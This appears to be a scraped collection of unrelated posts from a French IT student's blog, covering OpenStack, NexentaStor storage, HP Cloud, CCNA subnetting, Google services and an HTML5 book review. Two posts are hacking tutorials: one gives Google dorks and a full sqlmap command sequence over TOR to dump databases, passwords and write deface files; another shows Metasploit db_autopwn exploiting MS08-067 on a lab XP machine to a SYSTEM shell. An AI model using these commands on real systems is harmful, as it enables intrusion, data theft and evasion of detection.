But today, I’m proud to release my first documentation on OpenStack.

I’ve been working for three weeks with StackOps for my internship, and my work is about Quantum (Networking as a service in OpenStack).

It was quite difficult to have a working infrastructure because Quantum is only in « incubation » for Essex release. That’s why I release a documentation in which anyone can test this fabulous software.

You can find this documentation with all configuration files & scripts here.

Or read it directly here :

Download (PDF, 320.87KB)

Share & Enjoy !

N.B. : Thank’s to StackOps team for the welcome in Madrid.

Please let me know if you can find some mistakes, and of course I will correct it.

Toujours dans mon projet de formation sur OpenStack, j’ai décidé de me concentrer sur la partie stockage d’une infrastructure.
 
 
 
Je recherchais une solution qui répondait à ces critères :

• Environnement Open-Source
• Respect des standards
• Compatibilité avec les IaaS du marché (on verra plus tard que j’ai testé VMware & OpenStack)
• Bien documenté, et si possible un forum bien actif

J’ai donc choisis de tester NexentaStore Enterprise Edition dans sa version d’essai.

Ce que j’ai eu en plus avec Nexenta :

• Une interface d’administration & de configuration user-friendly (Web-GUI)
• Une liste très impressionnante de plugins (gratuits & payants) qui apportent des fonctionnalités non-négligeables
• La chance de pouvoir tester NexentaStor Enterprise Edition gratuitement pendant 45 jours.
• L’immense chance de pouvoir tester le plugin « HA Cluster » (que nous verrons plus tard) pendant 45 jours également (merci à l’équipe de Nexenta de m’avoir aidé).

Qu’est-ce que l’Open-Storage ?

Pour résumer l’Open-Storage avec des mots simples :
Fournir du stockage de manière standard, provenant de différentes sources, propriétaires ou libres. C’est donc s’affranchir du matériel propriétaire et hétérogène, pour rationaliser ses ressources en stockage.
L’Open-Storage est donc une solution économique de se créer une baie de disque hautement disponible et tolérante aux pannes, à partir de différentes sources de stockage.
En résumé, voici 3 avantages liés à l’Open-Storage :

• Votre stockage devient ouvert et accessible, grâce aux standards de l’industrie du stockage.
• Vous dessinez vous-même votre architecture de stockage. Il n’y a donc aucune limite à votre infrastructure !
• Votre Hardware devient flexible, dans la mesure où tout changement devient transparent pour l’utilisateur final.

Cas concret :

Je dispose actuellement d’une baie de stockage EMC, avec des disques plutôt performants en lecture / écriture. A coté de ça, j’ai récupéré une baie de disques SSD (très rapides donc), et enfin une baie assez ancienne comprenant des vieux disques toujours opérationnels.

Dans mon réseau, je souhaite fournir du stockage :

• assez performant pour mes serveurs ESXi pour le stockage des machines virtuelles.
• plutôt rapide pour mon infrastructure VDI, fournie par VMware View
• lent, mais facilement extensible pour du Cloud storage (exemple : Dropbox, Ubuntu One, SkyDrive, etc).

Ce que fait NexentaStore :

Pour commencer les présentations, il est bon de rappeler les bases.

NexentaStor est une appliance, basée sur OpenSolaris. Étant payante, j’ai donc usé de la licence Trial qui m’a permis de tester le produit dans sa totalité pendant 45 jours.

Il existe une version gratuite, NexentaStor Community Edition qui permet de fournir jusqu’à 18To de stockage (Raw). Attention, je n’évoquerai pas ce produit dans cet article car il ne supporte pas l’ajout des plugins type « HA Cluster » & autre.

Pour voir la liste complète des fonctionnalités, vous pouvez directement le lire sur le site officiel. Cependant, voici les points intéressants de ce produit :

• Système de fichiers ZFS 128 bits
• Aucune limite de stockage (ni eu capacité de stockage, ni en taille de fichier)
• Compatible SAN (iSCSI & FC) & NAS (NFS, CIFS, WebDAV et FTP)
• Optimisation du stockage (compression, dé-duplication)
• Création de Pools de stockage (pour améliorer les performances)
• Snapshots à chaud
• Réplication synchrone et asynchrone (pour faciliter le Disaster Recovery)
• Intégrité des données
• De nombreux plugins très puissants (je reviendrai plus tard vers le plugin HA Cluster)
• Et enfin, ce que j’ai vraiment apprécié : intégration avec VMware, Xen, OpenStack et Hyper-V.

Avec NexentaStor, je vais être capable de rationaliser le stockage que j’ai à ma disposition, de le rendre hautement disponible et tolérant aux pannes, et enfin de le distribuer vers des hôtes à travers des protocoles standards et connus de tous.

Mon infrastructure

Des fois, un bon vieux dessin vaut mieux qu’un gros pavé. Donc j’ai pris Visio pour vous montrer mon architecture :

• Je dispose d’une baie EMC avec des disques dur SAS en RAID 5, ainsi qu’une autre baie avec des disques SSD.
• Mes 2 appliances sont virtualisées dans mon infrastructure VMware, et sont en cluster avec le plugin HA.
• Je fournis du stockage pour les clients légers (VDI), mes VMs & volumes (pour OpenStack), et pour du Cloud Storage.

Ce que j’ai testé :

Dans un premier temps, j’ai testé :

• les fonctionnalités de base : Mapping de volumes over iSCSI, partage de fichier CIFS (dans un domaine 2008 R2 Natif), et NFS.
• Ensuite, j’ai fait la demande au service commercial de Nexenta pour tester gratuitement le plugin HA Cluster (qui coûte 4900 $). Il m’a permis de rendre hautement disponible le stockage que je met à disposition sur on réseau.

Je vais m’attarder sur ce plugin car je l’ai trouvé particulièrement puissant :

• L’installation se fait assez aisément, mais il faut au préalable avoir lu la documentation officielle (comme d’hab, RTFM !!!), sinon vous aurez des erreurs.
• J’ai été agréablement surpris. Tout a fonctionné du 1er coup : l’installation du plugin, la configuration de la mise en cluster des 2 appliances, la création des volumes à partager, et la configuration dans VMware ESX (la configuration du Multipath se fait toute seule).
• J’ai testé le basculement vers le serveur secondaire en mode Failover automatique et l’interruption de service était de 8 secondes (le temps pour l’IP Failover de switcher vers l’autre serveur). J’ai vraiment aimé le principe de pouvoir utiliser les cartes réseaux en Failover et continuer à fournir le stockage depuis le serveur principal. Si c’est le serveur en entier qui n’est pas accessible, l’autre prendra le relais et le service ne sera pas stoppé.

Voici une capture d’écran du dashboard du plugin HA Cluster (Cliquez-sur l’image pour agrandir) :

Par rapport à ce plugin, je dirais qu’il va à l’essentiel : il fonctionne et permet réellement de faire de la HA au niveau storage.

• Autre plugin très intéressant : VMDC (Virtual Machines Datastore Center). Il permet de gérer les datastores d’un hyperviseur directement depuis l’IHM de NexentaStor. Il est compatible avec VMware, Xen et Hyper-V. Suivant l’API de l’hyperviseur, certaines fonctionnalités sont disponibles en plus, comme l’arrêt ou le redémarrage des VMs.

• Je garde le meilleur pour la fin… le plugin OpenStack, qui permet d’intégrer du stockage fournis par NexentaStor dans une infrastructure OpenStack, et plus particulièrement pour le service nova-volumes (qui fournit des block devices aux VMs). De base, le driver est capable de créer des volumes, de les supprimer, et de réaliser des snapshots, et tout ça grâce aux REST API. Je rajouterai encore quelque chose de très pertinent : la distribution StackOps intègre nativement le driver NexentaVolumeDriver, et permet dès le SmartInstaller d’indiquer où se trouve le serveur NexentaStor.

Ce que j’en pense :

Vous l’aurez compris… que du bien !

Non, plus sérieusement. NexentaStor est un produit de qualité, et je pense qu’en s’ouvrant aux différentes technologies, il s’offre un bel avenir devant lui, et continuera de séduire tous ceux qui ne peuvent pas s’offrir des baies de stockages propriétaires. Ce que j’ai vraiment aimé, c’est la compatibilité avec les différents protocoles de transport de fichiers (NFS, CIFS, FTP, WebDAV) et également les technologies SAN (iSCSI & FC). De plus, ses plugins font de NexentaStor une solution flexible, et ouverte à un environnement hétérogène. Peu importe votre matériel et vos outils déjà en place : il sait s’adapter, et offrir ce qu’il sait faire de mieux : du stockage hautement disponible.

Les alternatives :

Il existe plusieurs alternatives, mais j’en ai testé une Open-Source, et une propriétaire.

Il s’agit de FreeNAS, et de Datacore SAN-Symphony-V.

• Concernant FreeNAS, ses fonctionnalités ne sont pas aussi poussées que les produits de Nexenta.
• Pour SAN-Symphony-V de Datacore, j’ai eu la chance d’avoir un cours sur le produit, ainsi qu’un TP à l’université. Je dois dire que le software est impressionnant, et qu’il fournit du stockage de manière performante et hautement disponible grâce à la mise en cluster. Il ne manquerait plus qu’une interopérabilité avec d’autres acteurs du  Cloud comme le fait Nexenta avec ses plugins vus précédemment, ainsi qu’une REST-API (le seul moyen d’administrer le stockage sous SSV étant le Powershell ou la GUI en dotnet depuis Windows). J’ai eu l’occasion de créer du stockage à partir de SAN-Symphony pour OpenStack nova-volumes, mais je n’ai pas fait de benchmark pour le comparer avec le produit Nexenta.

Si des gurus du Cloud lisent cet article, n’hésitez pas à laisser votre commentaire !
 
Je vous laisse, je retourne dans mes nuages

J’explique le concept de partage de cartes réseaux sur un serveur VMware ESX.

C’est vidéo est la 1ère partie car elle est théorique, et la 2ème sera pratique puisqu’on configurera ensemble un vSwitch suivant le résultat obtenu dans la 1ère vidéo.

Alors, vous avez compris ?

Pour rappel, HP se lance dans le Cloud public avec l’arrivée d’HP Cloud Services qui propose tout comme ses concurrents (RackSpace, IBM, …) un cloud de type IaaS (Infrastructure As A Service).

Je me suis donc précipité sur l’invitation, et j’ai créé mon compte afin de tester tout ça.

Pour tout vous avouer, ce qui m’a le plus motivé à tester le produit, c’est évidemment le fait qu’il soit basé sur OpenStack.

Je vous rapporte donc ce que j’ai testé, et les différentes fonctionnalités que j’ai appréciées ou celle que je n’ai pas vues.

Résultats du test :

- Compute :

• 2 clusters localisés à l’ouest des USA (pour l’instant).
• Pour ma part, aucun problème de latence.
• 6 tailles de serveurs (j’ai testé la standard.xsmall ainsi que la standard.large)
• Plusieurs images disponibles, toutes basées sur Linux (Ubuntu, CentOS)
• 1 IP publique par VM ! Pour le coup, j’ai vraiment été surpris.
• la gestion des VMs peut se faire via API (avec euca2ools) sinon depuis le dashboard d’HP qui est plutôt bien fait.
• On accède aux VMs par SSH (avec la clé privée qu’il faut télécharger), et le terminal est bien renseigné (facturation, ressources consommées, charge en temps réel…)
• Voici mes critiques : impossibilité de faire des snapshots des VMs (pour l’instant j’imagine), pas moyen pour le moment de créer des volumes, et de les attacher aux VMs (avec la fonction de snapshot si possible).
• Ensuite, j’aurais bien apprécier de pouvoir migrer les VMs entre cluster, mais je n’ai pas eu de réponse d’HP concernant cette fonctionnalité… A voir donc si ce sera possible dans l’avenir.

- Cloud storage :

• L’interface Web intègre une gestion de son Cloud Storage.
• Les fonctionnalités sont rudimentaires : Envoyer / Télécharger des fichiers depuis cet espace.
• J’imagine que derrière tout ça se cache le module Swift (OpenStack Storage) donc rien à dire de ce coté, si ce n’est qu’on ne connaît pas encore la limite de stockage pour l’offre de base, et il n’y a pas encore de fonction de partage de fichier. Bref, c’est une Beta !!
• Cela-dit, je suis plutôt content qu’une interface web soit enfin développée pour gérer du cloud storage avec Swift. Remarquez sur la capture d’écran que l’interface est plutôt simple mais assez complète pour l’instant.

Bien sûr, ces remarques n’engagent que moi-même, et je suis ouvert à toute discussion.

Dans tous les cas, je suis très heureux de voir OpenStack continu d’être adopté par les plus grands de ce monde… Pourvu que ça dure !!!

Pour ceux qui passent comme moi les examens Cisco CCNA, il est obligatoire de maîtriser le calcul de masque, ainsi que les calculs VLSM / CIDR.
Je ne vais pas refaire le cours de Cisco qui est très bien fait, mais je vais vous exposer quelques trucs & astuces pour bien réussir ce type d’exercice.

Ce que je fais en premier

Lorsque je tombe sur un exercice avec du calcul VLSM / CIDR, j’ai mes réflexes.

Je prends une feuille de brouillon, et je commence par écrire :

255.255.255.252 – /30 – 2 adresses hôtes

255.255.255.248 – /29 – 6 adresses hôtes

…

Je m’arrête au 255.255.255.0 – /24 – 254 adresses hôtes si l’exercice porte sur un adressage en classe C, sinon je continue plus haut.

Pour m’aider, je n’hésite pas à m’écrire la liste complète des puissances de 2 jusqu’à 256.

Lorsque l’exercice est du style : 192.168.1.0/24

Je fait un genre de camembert, dans lequel j’ajoute au fur et à mesure les plages prises par les sous-réseaux.

Je pense que la meilleure méthode est de commencer par les réseaux avec le plus d’hôtes (avec le masque de sous-réseau le plus large donc).

Exemple :

192.168.1.0/24 doit être divisé en plusieurs sous-réseaux (2 pour 60 hôtes, 2 pour 30 hôtes, et 3 liens inter-routeurs.

Je commence par le sous-réseau qui comportera les 60 hôtes. C’est un /26. Je fais le 2ème, puis ensuite j’attaque le sous-réseau de 30 hôtes. C’est un /27. Et ainsi de suite.

Avec cette méthode, on ne gaspille pas d’adresse IPV4 dans la plage qui nous est attribuée.

De l’entraînement, encore et encore…

Il n’y a pas de secret, il faut s’entraîner encore et encore… Dans le CCNA 2 chapitre 6 consacré au VLSM / CIDR, vous avez pas mal d’exercices d’entraînement. Celui sur la classe B (/16) est vraiment formateur, je vous conseille de vous entraîner sur des grosses architectures de ce style… Une fois qu’on a réussi à le faire pour une classe C, il faut voir si l’on est capable de le faire pour des plus gros réseaux.

Je vous laisse, je continue mes révisions !

Qu’on ne le veuille où non, Google est aujourd’hui un outil dont on ne peut se passer. La plupart des services fournis par Google sont de types SaaS (Sofware As A Service) et rentrent dans la famille du Cloud Computing.

Avec ce type de service, Google permet aux petites entreprises par exemple de délaisser leur réseau interne, pour une plate-forme entièrement collaborative et accessible depuis n’importe où via Internet. La seule contrainte : disposer d’un compte Gmail.

Donc que ferais-je sans Google ?

• Sans Google Search, je ne serais pas capable de trouver exactement ce que je veux sur la toile. Il n’y a pas débat à faire, Google est tout simplement le meilleur moteur de recherche sur cette planète. Ceux qui me contredisent n’auront qu’à me donner des exemples, mais à ce que je sache c’est aussi le plus utilisé. D’ailleurs, je me suis toujours demandé l’impact écologique du fond blanc de la page d’accueil qui fait consommer plus d’énergie selon moi…
• Sans Gmail, je n’aurais pas de boite mail regroupant 6 autres adresses provenant de domaines différents, une gestion des contacts synchronisée avec mon téléphone Android, et aussi son Gestionnaire de Tâches qui permet d’écrire des notes rapidement.
• Sans Google Agenda, je ne penserais à rien, et je raterais tous mes rendez-vous. Encore une fois, trouvez-moi un agenda collaboratif aussi puissant que celui-ci : import / export dans différents formats, invitations d’autres contacts à une réunion, etc.
• Sans Google Documents, je me trimbalerais sans cesse avec ma clef USB, et galèrerais à partager des documents avec mes amis ou collègues. Travailler sur un projet n’a jamais été aussi simple ! Ouvrir un document à plusieurs et y mettre des commentaires en direct, répond tout à fait à mes besoins.
• Sans Google Plus, je n’aurais aucun réseau social qui me permettrait de partager des idées avec les gens que je veux, en mélangeant travail et vie personnelle en toute confidentialité.
• Sans Picasa, je ne pourrais pas partager mes plus beaux souvenirs avec mon entourage, et il serait plus compliqué de montrer des photos avec tout le monde à la fois.
• Sans Google Reader, je ne pourrais pas lire tous mes flux RSS préférés à la fois, synchronisés avec mon téléphone portable.
• Sans Google Map, je me serais certainement perdu un bon millier de fois (en voiture grâce à l’application Android « Navigation » et à pied).
• Et enfin, sans Google Labs, chaque produit Google n’aurait aucun sens, et ne communiquerait pas avec les autres (exemple : interactions entre Gmail et l’Agenda).

Bref, j’ai beaucoup d’admiration pour ceux qui travaillent chez Google. Peu importe ce que l’on peut dire à leur sujet, ils auront toujours une longueur d’avance et me feront toujours aimer le web. Merci à eux, et aux concepteurs de tous ces services formidables…

Cela fait plusieurs semaines que je travaille sur un projet de Cloud Open-Source, de type IaaS (Infrastructure As A Service). Je dois dire que c’est un projet très intéressant et surtout prometteur dans un monde où VMware a tendance à écraser le marché. Je trouve génial de pouvoir disposer d’outils libres et gratuits pour comprendre la virtualisation.

Dans cet article, je vais vous présenter mon projet, et je vous publie aussi le résultat de mon travail (un Powerpoint d’une cinquantaine de slides qui résume mon étude).

Mise en situation

Concrètement, il m’a été demandé par mon directeur de formation d’installer un service de Cloud Computing Open-Source (avec OpenStack) qui fournirait un catalogue d’images (Ubuntu Server, Windows 2008 R2, etc) et managable depuis un navigateur Web. Plus concrètement, voici un descriptif du processus :

• Le client se connecte via un navigateur Web sur un Dashboard
• En fonction de son profil, il a le droit ou non de créer des machines virtuelles, de créer des images, des snapshots, de gérer son réseau, etc.
• Le client crée une machine virtuelle (exemple : Ubuntu Server) à partir d’un template, et lui attribue une adresse IP publique.
• Il peut accéder à sa VM via SSH et a un accès root au système.
• La machine peut être rebootée, et éteinte.
• Le client peut consulter ce qu’il a consommé et voir combien il paiera en fin de mois pour son usage.

Plusieurs points sont intéressants, c’est tout d’abord le dashboard. Accessible depuis Internet, le client s’authentifie de manière sécurisée et effectue toutes ses tâches nécessaires. Secundo, le principe de facturation est super intéressant pour une entreprise qui facture à son client en fonction de son utilisation. Enfin, outre le fait que tout les outils sont libres et gratuits, ils sont très compatibles avec les API des autres systèmes (ex : Xen, VMware, etc).

Mon étude

Je ne vais pas rentrer dans les détails ici, mais plutôt vous donner le lien de téléchargement de mon fichier PDF que j’ai réalisé pour ma présentation.

Voici un aperçu avec Google Doc (il manque des visuels) :

Download (PDF, 1.09MB)

Dans quelques semaines, je recommence à travailler sur ce projet, et je vais me concentrer sur le nouveau Dashboard (Diablo) qui permet de faire plus de trucs que le module Cloud de Drupal. J’aimerais aussi me pencher sur la compatibilité avec les autres hyperviseurs, notamment les proprio (ça m’intrigue !). Enfin, je compte me perfectionner sur la haute disponibilité pour prétendre avoir un Cloud Open-Source performant, disponible, et compatible !

La suite bientôt…
PS : Le document fourni est 100% libre de droit, mais en cas de réutilisation, merci de me prévenir . Je suis également adepte au remarques et critiques, donc n’hésitez pas !

Je ne peux pas parler de ce sujet sans aborder les injections SQL. Toutefois, la lecture de ces quelques lignes requiert certaines connaissances en base de données SQL. Je ne ferai aucun rappel sur ce langage.

Voici le plan de cet article :

• Définition
• Exploitation
• Impact
• Se protéger

Bien entendu, cet article a pour vocation d’expliquer comment les hackers font, et comment se protéger des attaques de ce type.

• Définition

Une injection SQL est une méthode d’exploitation d’une faille de sécurité liée à une base de données. Elle consiste via une application utilisant une base de données SQL à injecter une requête qui permettrait d’obtenir beaucoup d’informations allant de la version du serveur jusqu’à la base de données complète. Nous allons voir dans la partie « Impact » ce qui est exploitable également.

Techniquement, une injection SQL via un site web consiste à exploiter une variable non protégée appelée via une URL.

Voici un bref exemple : « http://www.target.com/photos.php?id=1 »

Cette URL affiche par défaut la page d’identifiant 1 par rapport à la base de données.
En fin de compte, cette URL pourrait ressembler à cette requête SQL :

SELECT *
FROM photos
WHERE 'id_photos = 1' ;

Cette requête pourtant simple permet toutefois beaucoup de choses si le code PHP a été mal programmé. Nous y reviendrons plus tard.

• Exploitation

La meilleure explication est l’exemple.

Le hacker va tout d’abord chercher sa victime en fouillant le site Internet cible. Il pourra notamment s’aider de Google.

Par exemple, il va rechercher sur Google tous les « gallery.php » utilisant des ID :
inurl:gallery.php?id=

Dans la plupart des cas, les sites Web sont faits à l’aide de CMS, ou alors codés entièrement à la main. Mais il arrive que ces CMS ne soit pas à jour, ou alors que le développeur web n’est pas pris soin de protéger les variables utilisées par les URL.

Lorsque le hacker va tomber sur une page de ce style, il va remplacer le 1 par un -53 par exemple, de manière à provoquer une erreur.

Si le message suivant apparaît, vous pouvez être sûrs qu’une injection SQL est possible :

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/users/site/html/gallery.php on line 248

En fait, j’irai même plus loin en disant que si http://www.target.com/photos.php?id=1 affiche la même chose que http://www.target.com/photos.php?id=1+AND+1=1 ou/et que http://www.target.com/photos.php?id=1+AND+1=2 diffère de la 1ère page, il y a vulnérabilité.

Avec la distribution Backtrack, voyons maintenant ce que l’on peut faire. L’excellent outil « SQLmap » nous permettra de réaliser tous les tests nécessaire pour une injection SQL.

Je vais vous montrer quelques commandes (je n’invente rien, j’ai juste lu la doc ).

Note : Dans toutes mes commandes, j’utilise TOR pour rester anonyme, ainsi qu’un générateur d’USER-AGENT pour que le serveur web distant ne détecte pas de requêtes HTTP provenant d’un certain « SQLmap ».

Pour exécuter ces commandes, il faut avant se rendre dans le répertoire /pentest/database/sqlmap. Il faut également remplacer quand c’est le cas dans mes commandes $url par l’URL du site, $db par le nom de la base de données, $table par le nom de la table, $column par le nom de la colonne et $sql par la requête SQL voulue.

Auditer si l’URL est vulnérable :
python sqlmap.py -u $url -v 1 –proxy=http://localhost:8118 –random-agent

Si le site est vulnérable, il vous le dira explicitement.

C’est le cas pour notre exemple, passons à la suite.

Lister les privilèges SQL avec l’injection SQL :
python sqlmap.py -u $url -v 1 –proxy=http://localhost:8118 –random-agent –privileges

Lister les bases de données :
python sqlmap.py -u $url -v 1 –proxy=http://localhost:8118 –random-agent –dbs

Indiquer le nom de la base de données où l’injection SQL se fait :
python sqlmap.py -u $url -v 1 –proxy=http://localhost:8118 –random-agent –current-db

Montrer les mots de passe d’accès à la base de données :
python sqlmap.py -u $url -v 1 –proxy=http://localhost:8118 –random-agent –passwords

Lister les tables sur 5 threads (plus rapide) :
python sqlmap.py -u $url -v 1 –proxy=http://localhost:8118 –random-agent –tables -D $db –threads= »5″

Lister les colonnes :
python sqlmap.py -u $url -v 1 –proxy=http://localhost:8118 –random-agent –columns -D $bdd -T $tables

Dumper le contenu d’une table :
python sqlmap.py -u $url -v 1 –proxy=http://localhost:8118 –random-agent –dump -D $db -T $table –threads= »5″

Exécuter une requête SQL :
python sqlmap.py -u $url -v 1 –proxy=http://localhost:8118 –random-agent –sql-query= »$sql » -D $db

Si vraiment le serveur est mal configuré, il est aussi possible d’écrire un fichier (utilisé lors de defacements) :
python sqlmap.py -u $url -v 1 –proxy=http://localhost:8118 –random-agent –file-write=$file –file-dest /var/www/public_html/

SQLmap s’utilise aussi avec Metasploit :

$ msfconsole
 
                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##
 
msf > use auxiliary/scanner/http/sqlmap
msf auxiliary(sqlmap) > set RHOSTS [TARGET HOST RANGE]
msf auxiliary(sqlmap) > run

Vous l’aurez compris, cet outil est hyper puissant, d’ailleurs j’insiste sur le fait que pour obtenir de meilleurs résultats, il est important de le mettre à jour régulièrement avec l’option –update.

• Impact

Quel impact d’une telle attaque ?
La liste peut être longue, mais je vais faire court :

- compromission d’une partie ou d’une entière base de données, qui peut contenir des informations précieuses : logins, mots de passe, e-mails, coordonnées bancaires, etc.
- compromission d’autres bases de données quand un seul utilisateur existe pour 150 bases de données (sisi je vous jure, ça existe).
- compromission des données du serveur Web (on a vu qu’on pouvait dans certains cas écrire sur le serveur).

• Se protéger

Il existe à chaque niveau des moyens pour se protéger contre les injections SQL.

Je vais partir des couches basses pour remonter peu à peu :

- Installer un équipement de détection d’intrusion de type IDS et mettre régulièrement à jour la base de données qui contient les « exploits » connus.
- Installer un SGBDR connu, et le mettre à jour très régulièrement. Par exemple, MySQL est très performant, mais nécessite toutefois d’être mis-à-jour souvent.
- Utiliser au mieux toutes les fonctionnalités des bases de données : pour chaque site par exemple, créer sa base de données, son utilisateur SQL, avec un minimum de droits. Bien entendu, le concept d’un seul utilisateur avec tous les droits partout est à proscrire !!!
- Utiliser un serveur Web reconnu et le mettre à jour souvent. Apache est très bien reconnu dans le domaine.
- Enfin, il est plus qu’obligatoire de protéger toutes les variables utilisées.

Exemple : $id = mysql_real_escape_string($_POST['id']);

Dans ce domaine, voici un lien très intéressant. Si vous n’y connaissez rien, utiliser un CMS bien reconnu, et mettez-le à jour dès que possible ! (WordPress par exemple)

En résumé : utiliser des outils connus et les mettre à jour régulièrement.

En conclusion, SQL est un langage surpuissant, qui demande beaucoup de connaissances. Négliger la sécurité dans les couches hautes, peut compromettre tout le reste. Imaginer le pire : intrusion sur un serveur web via injection SQL, accès à d’autres serveurs via une connexion de pont, dump de toutes les bases de données, defacement de sites web…

Aujourd’hui, les injections SQL sont les vulnérabilités les plus utilisées sur le Web.
A bon entendeur…

L’exploitation de faille est un moment excitant. Toutes les recherches engagées vont normalement porter ses fruits. Nous allons enfin explorer les faiblesses d’un réseau ou d’un système.
Suivant les vulnérabilités, il y a des tonnes de possibilités en matière d’exploitation. Si vous voulez en savoir plus, faites comme moi et achetez un bon bouquin relatant des techniques de Hacking. Vous comprendrez mieux quelles sont les différentes méthodes pour exploiter une faille, ainsi que les différents types de failles.

Comme il existe beaucoup de types de failles, et énormément de méthodes, je m’arrêterai sur un cas général, en appliquant une technique « classique ».

Après avoir collecté un tas d’informations sur le réseau, ainsi que sur la machine ciblée, nous avons évaluer ses vulnérabilités. Rappelez-vous de notre bon ami Nessus qui nous a clairement indiqué que la machine cible avait comme système d’exploitation Windows XP SP3, et proposait le service de système de fichiers réseau CIFS. Seulement voilà, cette machine est vulnérable. Non pas parce qu’elle utilise ce service, mais parce que l’administrateur de la machine n’a pas pris le temps de mettre à jour régulièrement son système d’exploitation via Windows Update, ainsi que l’antivirus

Sachez que les tests réalisés en réseau local ont été effectué avec l’antivirus Avira Antivir (ainsi qu’une base de données antivirale de moins d’un an), sur un Windows XP SP3 sans mises à jour récentes.

Vous serez surpris de voir qu’il existe énormément d’ordinateurs au monde dans ce cas là. Ils sont souvent la proie des virus sur Internet (qui aident notamment à réaliser des attaques DDoS (Distributed Denial of Service).

Dans notre étude de cas, nous allons utiliser Metasploit Framework (MSF).

Sa base de données contient tous les exploits / payloads connus à ce jour. Bien entendu, pour une bonne utilisation de cet outil, il est important de le mettre à jour régulièrement (voir même avant chaque utilisation) avec la commande « msfupdate« .

Dans un terminal, démarrez l’outil « msfconsole« .

root@root:~# msfconsole
 
_
| |      o
_  _  _    _ _|_  __,   ,    _  | |  __    _|_
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
|  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|
 
=[ metasploit v3.7.0-release [core:3.7 api:1.0]
+ -- --=[ 684 exploits - 355 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
 
msf >

Nous allons utiliser le résultat du scan Nessus exécuté dans dans la recherche de vulnérabilité (dernier article), et l’importer dans une base de données SQL :

msf > db_import /root/nessus_report_Win.nessus
[*] Importing 'Nessus XML (v2)' data
[*] Importing host 192.168.128.129
[*] Successfully imported /root/nessus_report_Win.nessus
msf > db_import /root/nessus_report_Win.nessus
[*] Importing 'Nessus XML (v2)' data
[*] Importing host 192.168.128.132
[*] Successfully imported /root/nessus_report_Win.nessus

MSF connaît maintenant votre victime : comment la joindre, et surtout quelles sont les vulnérabilités trouvées par Nessus.

Nous allons lancer une commande qui va automatiquement exploiter l’un des failles disponibles afin d’obtenir une session avec la machine distante. Admirez le travail :

msf > db_autopwn -x -e
[*] (1/3 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.128.132:445...
[*] (2/3 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.128.132:445...
[*] (3/3 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.128.132:445...
[*] (3/3 [0 sessions]): Waiting on 3 launched modules to finish execution...
[*] Meterpreter session 1 opened (192.168.128.138:48400 -> 192.168.128.132:6313) at 2011-09-05 09:40:24 -0400
[*] (3/3 [1 sessions]): Waiting on 1 launched modules to finish execution...

0wned ! Le tour est joué, la machine distante est prise au piège. Nous avons utiliser l’exploit ms08_067_netapi pour pénétrer le système.
Pour retrouver une session ouverte, il suffit d’exécuter cette commande :

msf > sessions -l
 
Active sessions
===============
 
  Id  Type                   Information                           Connection
  --  ----                   -----------                           ----------
  1   meterpreter x86/win32  AUTORITE NT\SYSTEM @ VICTIME-484AF1D  192.168.128.138:48400 -> 192.168.128.132:6313

Et maintenant ?

Maintenant passons aux vilaines choses.
Pour obtenir le shell d’une session ouverte, il suffit de l’appeler par son ID :

session -i 1

Ensuite, la commande « help » vous éclairera sur la suite. Vous pouvez par exemple explorer les fichiers, prendre une capture d’écran, enregistrer les touches du clavier utilisées et encore plein d’autres trucs, dont des tâches administratives.

Cependant, un hacker ayant obtenu le shell d’un système essaye dans la plupart des cas de rester discret.
Dans le prochain article, nous allons voir comment installer un « backdoor » afin de pouvoir revenir plus tard sur le système sans exploiter de faille.
Ah oui, j’oubliais. Backtrack fournit une excellente interface graphique à MSF : « Armitage« .

Par rapport aux autres articles, aucune nouveauté en matière de lutte contre ce genre d’attaque. Un antivirus à jour, un pare-feu bien configuré, un système d’exploitation récent et à jour suffiront à éviter ce genre d’exploitation.

Aujourd’hui, les systèmes les plus vulnérables sont les sites Web qui sont très souvent victimes d’injections SQL permettant de récupérer des fichiers importants, et de compromettre la sécurité du serveur, et donc du réseau tout entier.

C’est vrai que d’habitude je n’achète jamais des livres de cette collection, mais là il fallait dire que pour 11 euros à peine, je me suis laissé tenter.

Je vous rapporte comme promis mon premier retour d’expérience sur ce livre mais avant toute chose, voici de quoi il traite :

• Rappels HTML
• Transition, puis Exploration des nouveautés HTML5
• Nouveautés liées aux formulaires
• Rappels sur CSS
• Éléments nouveaux avec CSS3
• Changements Javascript
• Comment travailler avec canvas
• Un bonus sur Javascript (1ère approche du langage)

Ce que j’ai adoré dans ce livre :

• Le prix. Beaucoup d’éditeurs ne se retiennent pas de publier des livres à 50 euros, qui au final n’apprennent pas forcément plus qu’un livre de ce genre.
• Son plan : Pour chaque langage évoqué : un rappel, la transition, et ses nouveautés.
• Les bon tuyaux mis en avant. Il est certain que le livre de rentre pas en profondeur pour chaque langage, mais l’essentiel y est avec un grain de sel en plus : les bons petits trucs à savoir.

Ce que j’ai moins aimé dans ce livre :

• Tout d’abord, les rappels HTML sont un peu longs je trouve. Normalement, le lecteur de ce livre a déjà quelques notions dans le domaine, mais j’ai trouvé que les rappels étaient trop poussés. Moins de rappels et plus de détails auraient été les bienvenus !
• Les nouvelles notions de Javascript ne sont pour la plupart pas supportées par les navigateurs d’aujourd’hui. Peu d’intérêt donc de lire ce chapitre. Ils auraient pu nous parler des API JS du moments par exemple !
• Le chapitre final (Bonus Javascript) n’a pas sa place dans ce livre. Si nous voulions nous former à Javascript, nous achèterions « Javascript » pour les Nuls ». Bref, j’ai l’impression qu’ils ont essayé de combler la fin afin de faire du contenu.

Conclusion :

Pour une première approche de HTML5, le livre est vraiment sympa. L’auteur va réellement à l’essentiel, et pas mal de notions sont abordées quand même. De plus, pour le développeur en herbe, les notions de base sont bien rappelées. Cependant, pour l’intégrateur Web chevronné, ce livre sera nettement insuffisant pour sa culture et sa tâche.

